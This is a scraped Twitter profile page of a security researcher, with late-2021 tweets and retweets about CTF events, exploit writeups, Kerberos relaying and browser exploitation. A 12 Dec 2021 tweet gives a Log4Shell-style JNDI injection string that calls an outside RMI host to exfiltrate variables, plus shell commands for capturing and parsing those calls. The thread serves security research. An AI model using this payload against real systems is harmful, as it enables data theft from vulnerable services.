Maciej Piechota

@haqpl

I’m a security enthusiast and technology polyglot, pug lover and drum’n’bass head. Vice Captain @ justCatTheFish, HTB @ AlphaPwners, Daily Pwning @ SECFORCE

Łódź, Polska
haqpl.github.io
Joined September 2009
26 Photos and videos Photos and videos

Tweets

You blocked @haqpl

Are you sure you want to view these Tweets? Viewing Tweets won't unblock @haqpl

  1. 31 Dec 2021

    year means nothing, focus on today

    1 reply 5 likes
    Undo
  2. Retweeted
    15 Dec 2021

    Today we're publishing a detailed technical writeup of FORCEDENTRY, the zero-click iMessage exploit linked by Citizen Lab to the exploitation of journalists, activists and dissidents around the world.

    73 replies 1,830 retweets 4,932 likes
    Show this thread
    Show this thread
    Undo
  3. 12 Dec 2021

    Then just parse them: split -a 8 -l 1 rmi_calls && ls x* | xargs -I{} java -jar SerializationDumper-v1.13.jar -f {}

    2 likes
    Show this thread
    Show this thread
    Undo
  4. 12 Dec 2021

    In that way, you can setup Java RMI registry and watch how goodness arrives avoiding LDAP query length limitations😋 ./rmi_dump.sh 1099 eth0 ${jndi:rmi://host:1099/very_long_variable_to_exfiltrate}

    1 reply 2 retweets 12 likes
    Show this thread
    Show this thread
    Undo
  5. Retweeted
    9 Dec 2021

    Relaying Kerberos only using native Windows is so🔥 As a normal user we can trigger a Kerberos authentication for SYSTEM that we can relay to services such as LDAP to read LAPS or configure rbcd. Privesc/Lateral movement in any network without enforced signing, which is default😉

    31 replies 572 retweets 1,650 likes
    Show this thread
    Show this thread
    Undo
  6. Retweeted
    6 Dec 2021

    Elevate to SYSTEM from a Service Account with Impersonate privileges by only using C# code and the built-in RPC runtime! Great research from

    1 reply 269 retweets 695 likes
    Undo
  7. Retweeted
    2 Dec 2021

    We had a lot of fun during . Secured 4th place in the CTF.

    5 replies 4 retweets 58 likes
    Undo
  8. Retweeted
    30 Nov 2021

    مقتطفات من كلمة معالي المستشار تركي آل الشيخ وتكريمه للفائزين في تحديات

    64 replies 169 retweets 436 likes
    Undo
  9. Retweeted
    27 Nov 2021

    The day started well. Just registered for CTF, very exited!

    jCTF is getting ready!
    3 retweets 30 likes
    Undo
  10. Retweeted
    17 Nov 2021

    thanks to mine and $ 50k report with its are improving the security for all 😎 "we received a report... of a vulnerability that would allow an attacker to publish new versions of any npm package..." 🔥

    an update on recent security incidents across the registry as well as a look into our ongoing investments in maintaining the security of the registry (including 2FA requirements) ⬇️
    3 replies 20 retweets 53 likes
    Undo
  11. Retweeted
    10 Nov 2021

    are you trying to stay under the radar? Read our deep dive into a stealthier DLL hollowing / memory allocation variant, analyzing advantages, pitfalls and artifacts

    DLL Hollowing - Deep dive into a stealthier memory allocation variant, analyzing advantages, pitfalls and artifacts
    and
    1 reply 69 retweets 156 likes
    Undo
  12. Retweeted
    13 Nov 2021

    3rd part of my series on Chrome Browser Exploitation is out. Covered topics include: 1. General memory management 2. Pointer tagging/compression 3. Objects in v8 memory 4. Garbage Collection

    2 replies 121 retweets 361 likes
    Undo
  13. Retweeted
    10 Nov 2021

    Just watched "Practical HTTP Header Smuggling: Sneaking Past Reverse Proxies to Attack AWS and Beyond" - must-read research by 's Daniel Thatcher

    7 replies 244 retweets 651 likes
    Undo
  14. Retweeted
    26 Oct 2021

    👇Here's our writeup of CVE-2021-37748 and CVE-2021-37915. Lessons learned in ARM exploitation by and .

    https://www.secforce.com/blog/exploiting-grandstream-ht801-ata-cve-2021-37748-cve-2021-37915/
    1 reply 13 retweets 29 likes
    Undo
  15. Retweeted
    24 Oct 2021

    Congrats to top 3 teams: and I hope that you enjoy 🥳🥳🥳🥳

    1 reply 22 retweets 93 likes
    Undo
  16. Retweeted
    19 Oct 2021

    🔥 New video about security available 🔴 You will learn how to: - Download Firefox ASAN - Hook with Frida - List all Firefox modules & exports functions - Hook methods & print HTTP traffic - Create in-process fuzzing script

    4 replies 72 retweets 239 likes
    Show this thread
    Show this thread
    Undo
  17. Retweeted
    12 Oct 2021

    New post: Abusing 's file-sharing functionality to de-anonymise fellow workspace members. 🙃🔭😈

    3 replies 38 retweets 118 likes
    Show this thread
    Show this thread
    Undo
  18. Retweeted
    8 Oct 2021

    Together with we created a new XSS challenge! The trick is neat so better take your chances 💪. Could come very handy one day 🙃

    16 replies 34 retweets 149 likes
    Show this thread
    Show this thread
    Undo
  19. Retweeted
    27 Sep 2021

    Content of my talk "Breaking Azure AD joined endpoints in Zero Trust environments" is up! Video: Slides (pdf): As usual all the links to my talk materials are also on

    13 replies 235 retweets 515 likes
    Undo
  20. Retweeted
    14 Sep 2021

    New Project Zero blog post: Fuzzing Closed-Source JavaScript Engines with Coverage Feedback,

    4 replies 203 retweets 470 likes
    Undo

@haqpl hasn't Tweeted yet.

Loading seems to be taking a while.

Twitter may be over capacity or experiencing a momentary hiccup. Try again or visit Twitter Status for more information.

    You may also like

    ·